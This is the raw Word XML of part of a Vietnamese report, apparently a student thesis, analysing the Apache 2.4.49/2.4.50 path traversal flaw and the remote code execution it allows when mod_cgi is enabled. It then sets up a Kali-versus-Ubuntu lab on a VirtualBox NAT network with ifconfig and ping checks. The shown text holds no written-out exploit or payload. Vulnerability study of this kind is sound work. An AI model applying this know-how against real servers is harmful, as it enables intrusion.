    <w:p w14:paraId="75D62907" w14:textId="08A98C1F" w:rsidR="00A12239" w:rsidRDefault="00A12239" w:rsidP="00A12239">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc171085235"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Cấu hình</w:t>
      </w:r>
      <w:r w:rsidR="00BC386A">
        <w:t xml:space="preserve"> tồn tại lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="3AFEB8D2" w14:textId="533679EC" w:rsidR="0011485A" w:rsidRDefault="004F573F" w:rsidP="002A4F44">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để tấn công </w:t>
      </w:r>
      <w:r w:rsidR="003362E7" w:rsidRPr="003362E7">
        <w:t xml:space="preserve">remote code execution thì module </w:t>
      </w:r>
      <w:r w:rsidR="003362E7" w:rsidRPr="00370CFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mod_cgi</w:t>
      </w:r>
      <w:r w:rsidR="003362E7" w:rsidRPr="003362E7">
        <w:t xml:space="preserve"> phải được bật trên cấu hình của web server</w:t>
      </w:r>
      <w:r w:rsidR="000A5F77">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002946A2">
        <w:t xml:space="preserve">Trong đó </w:t>
      </w:r>
      <w:r w:rsidR="002946A2" w:rsidRPr="003362E7">
        <w:t>module mod_cgi</w:t>
      </w:r>
      <w:r w:rsidR="00BF14BE">
        <w:t xml:space="preserve"> là</w:t>
      </w:r>
      <w:r w:rsidR="002946A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF14BE">
        <w:t>một thành phần của máy chủ web Apache cho phép xử lý các yêu cầu CGI (Common Gateway Interface). Các yêu cầu CGI cho phép các ứng dụng web tương tác với máy chủ web bằng cách thực thi các chương trình hoặc lệnh từ xa</w:t>
      </w:r>
      <w:r w:rsidR="000F6472">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B74BC4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F92972">
        <w:t>Khi mod_cgi được bật và có lỗ hổng Path Traversal, kẻ tấn công có thể gửi một HTTP POST request để thực thi các lệnh trên máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="003772E5" w:rsidRPr="003772E5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9E7B0" w14:textId="03245F7C" w:rsidR="00857114" w:rsidRDefault="00857114" w:rsidP="002A4F44">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đề </w:t>
      </w:r>
      <w:r w:rsidR="002A4F44">
        <w:t>kích</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoạt </w:t>
      </w:r>
      <w:r w:rsidR="007B0C34" w:rsidRPr="003362E7">
        <w:t xml:space="preserve">module </w:t>
      </w:r>
      <w:r w:rsidR="007B0C34" w:rsidRPr="00370CFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mod_cgi</w:t>
      </w:r>
      <w:r w:rsidR="00642FC7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EFD683" w14:textId="5519212D" w:rsidR="00642FC7" w:rsidRDefault="00D81133" w:rsidP="009B083B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11ADFB20" wp14:editId="09C73CAC">
            <wp:extent cx="5972175" cy="1357630"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1540723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1357630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C39308" w14:textId="12C5714E" w:rsidR="002A4F44" w:rsidRDefault="002A4F44" w:rsidP="002A4F44">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc171085236"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00570D6A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B246B2">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00570D6A">
        <w:t>ách kích hoạt mod_cgi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="25EEC237" w14:textId="03841900" w:rsidR="004D092D" w:rsidRDefault="00805FBF" w:rsidP="00C11F4F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D04FB7" w14:textId="68F7C830" w:rsidR="00A77DC7" w:rsidRDefault="006551EA" w:rsidP="00C11F4F">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006551EA">
        <w:t>Với những phân tích trên thì có thể thấy được sự ảnh hưởng rất rõ ở đây đó là: Apache ver 2.4.49/2.4.50 + Cấu hình sai directory directive</w:t>
      </w:r>
      <w:r w:rsidR="006C09C6">
        <w:t xml:space="preserve"> sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00F40E25">
        <w:t xml:space="preserve">hoàn toàn có thể </w:t>
      </w:r>
      <w:r w:rsidR="00F40E25" w:rsidRPr="00F40E25">
        <w:t>đọc bất kì file nào tồn tại trên server</w:t>
      </w:r>
      <w:r w:rsidR="00E85D26">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15516A" w14:textId="6305B715" w:rsidR="00040DD5" w:rsidRDefault="00E85D26" w:rsidP="00C11F4F">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Với </w:t>
      </w:r>
      <w:r w:rsidR="00F4740B" w:rsidRPr="00F4740B">
        <w:t>Apache ver 2.4.49/2.4.50 + Cấu hình sai directory directive + enable mod_cgi</w:t>
      </w:r>
      <w:r w:rsidR="00F4740B">
        <w:t xml:space="preserve"> sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00040DD5">
        <w:t xml:space="preserve">xuất hiện lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="00040DD5" w:rsidRPr="00040DD5">
        <w:t>Remote Code Execution (Thực thi mã từ xa)​</w:t>
      </w:r>
      <w:r w:rsidR="005B1AE4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A8F6CC" w14:textId="65FF379B" w:rsidR="00E76B06" w:rsidRDefault="001B2E95" w:rsidP="00C11F4F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc171085531"/>
      <w:r>
        <w:t>Tiến hành thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="0CF57EC3" w14:textId="4FF529F6" w:rsidR="00165964" w:rsidRDefault="006E21EA" w:rsidP="00C11F4F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C65104">
        <w:t>ông cụ sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BDDDB" w14:textId="615671FC" w:rsidR="00C65104" w:rsidRDefault="00AD7E33" w:rsidP="005B1AE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD7E33">
        <w:t>Attacker Machine: Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="005B1AE4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A450A8C" w14:textId="4C5FCCDA" w:rsidR="00AD7E33" w:rsidRPr="00DB2661" w:rsidRDefault="001B4AAD" w:rsidP="005B1AE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B4AAD">
        <w:t xml:space="preserve">Webserver Machine: Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00EE15BF">
        <w:t>20.04</w:t>
      </w:r>
      <w:r w:rsidR="00E45A58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E45A58" w:rsidRPr="00DB2661">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(Lưu ý: với Ubuntu là server trước khi thực hiện câu lệnh cần </w:t>
      </w:r>
      <w:r w:rsidR="0001785A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">truy cập </w:t>
      </w:r>
      <w:r w:rsidR="00E45A58" w:rsidRPr="00DB2661">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>quyền root)</w:t>
      </w:r>
      <w:r w:rsidR="005B1AE4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDD194" w14:textId="72559CFE" w:rsidR="001B4AAD" w:rsidRDefault="0060576D" w:rsidP="005B1AE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="0060576D">
        <w:t xml:space="preserve">Phiên bản Apache </w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="0060576D">
        <w:t xml:space="preserve"> version 2.4.49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE6D3A0" w14:textId="70109C78" w:rsidR="00BB0FF8" w:rsidRDefault="00623390" w:rsidP="00815384">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện thiết lập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4523D" w14:textId="0E04F3DB" w:rsidR="00623390" w:rsidRDefault="00623390" w:rsidP="00815384">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="007F0A99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: </w:t>
      </w:r>
      <w:r w:rsidR="006549BC">
        <w:t>Thiết lập</w:t>
      </w:r>
      <w:r w:rsidR="00F64C76">
        <w:t xml:space="preserve"> kết nối máy ảo</w:t>
      </w:r>
      <w:r w:rsidR="00815384">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E893B" w14:textId="56E7C12C" w:rsidR="004A42AA" w:rsidRDefault="004A42AA" w:rsidP="00815384">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi dựng hai máy thành công thực hiện cấu hình Network </w:t>
      </w:r>
      <w:r w:rsidR="0085292B">
        <w:t>để hai máy có thể cùng trong mạng nội bộ</w:t>
      </w:r>
      <w:r w:rsidR="004B6A81">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F9409" w14:textId="7D305822" w:rsidR="0085292B" w:rsidRDefault="00487367" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Để cấu hình cùng mạng trên Kali và Ubuntu chọn mode NAT network – tạo một mạng nội bộ giữa 2 máy ảo và có thể kết nối với Internet. Mặc định với mode NAT network có dải mạng 10.2.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D4BC2" w14:textId="176BBBF1" w:rsidR="000C2245" w:rsidRDefault="00F52BFD" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Ubuntu: Virtual Box Manager -&gt; Setting ubuntu -&gt; Network -&gt; Adapter 1 -&gt; Attached to: NAT network -&gt; OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA0E7E7" w14:textId="26ED4BE8" w:rsidR="00E54741" w:rsidRDefault="00E54741" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA4011">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7885C597" wp14:editId="032E8C95">
            <wp:extent cx="3116580" cy="2450645"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="20980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22176" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3131474" cy="2462357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7298A5" w14:textId="2E06D4F4" w:rsidR="00093903" w:rsidRDefault="00093903" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc171085237"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Cấu hình network Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="66E29707" w14:textId="3B8778C3" w:rsidR="00E54741" w:rsidRDefault="00E967D5" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Kali: Virtual Box Manager -&gt; Setting kali -&gt; Network -&gt; Adapter 1 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B53CB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ttached to: NAT network -&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B53CB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401D44D" w14:textId="3B1D6AF4" w:rsidR="00AB56EB" w:rsidRDefault="005E30E0" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006159B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="729CD8FF" wp14:editId="120ECA9B">
            <wp:extent cx="3207209" cy="2522220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39823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9380" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3221293" cy="2533296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE4D230" w14:textId="49AF8B65" w:rsidR="00093903" w:rsidRDefault="00093903" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc171085238"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Cấu hình network Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="5A43B8E0" w14:textId="08AF6106" w:rsidR="000C2245" w:rsidRPr="002D3050" w:rsidRDefault="007009EB" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra địa chỉ IP</w:t>
      </w:r>
      <w:r w:rsidR="00784B28">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FD4824" w:rsidRPr="00A27238">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A5A02" w14:textId="0219B236" w:rsidR="002D3050" w:rsidRDefault="00DC6392" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B43FDF" w14:textId="2C2D0551" w:rsidR="00DC6392" w:rsidRDefault="00FC7B76" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00053CEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5631D11C" wp14:editId="50301376">
            <wp:extent cx="5151566" cy="1158340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="136608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4872" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5151566" cy="1158340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FCF8A" w14:textId="4D590B99" w:rsidR="00093903" w:rsidRDefault="00093903" w:rsidP="00093903">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc171085239"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Địa chỉ IP của Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="76DDAE4B" w14:textId="6ADF624F" w:rsidR="00DC6392" w:rsidRDefault="00DC6392" w:rsidP="008F6522">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22415DE6" w14:textId="44912BCB" w:rsidR="00FC7B76" w:rsidRDefault="004C1CBA" w:rsidP="008F6522">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00375797">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1049D66D" wp14:editId="7BB3D89A">
            <wp:extent cx="4549534" cy="1005927"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="3066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1529" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4549534" cy="1005927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFA1F0" w14:textId="1AC5CB4E" w:rsidR="008F6522" w:rsidRPr="002D3050" w:rsidRDefault="008F6522" w:rsidP="008F6522">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc171085240"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Địa chỉ I</w:t>
      </w:r>
      <w:r w:rsidR="00571023">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="70ECB32C" w14:textId="79A1A076" w:rsidR="002D3050" w:rsidRPr="0048114D" w:rsidRDefault="00BD053D" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00B746AF">
        <w:t>kết nối mạng</w:t>
      </w:r>
      <w:r w:rsidR="0055738F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0055738F" w:rsidRPr="00A27238">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="002A660C" w:rsidRPr="00A27238">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> địa_chỉ_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D30E0" w14:textId="1A6609A4" w:rsidR="0048114D" w:rsidRDefault="002A660C" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFA979" w14:textId="0ED58F08" w:rsidR="00944AB7" w:rsidRDefault="00944AB7" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00022178">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31DCD3FD" wp14:editId="7FBD5F95">
            <wp:extent cx="4351397" cy="1653683"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="80786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2951" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4351397" cy="1653683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
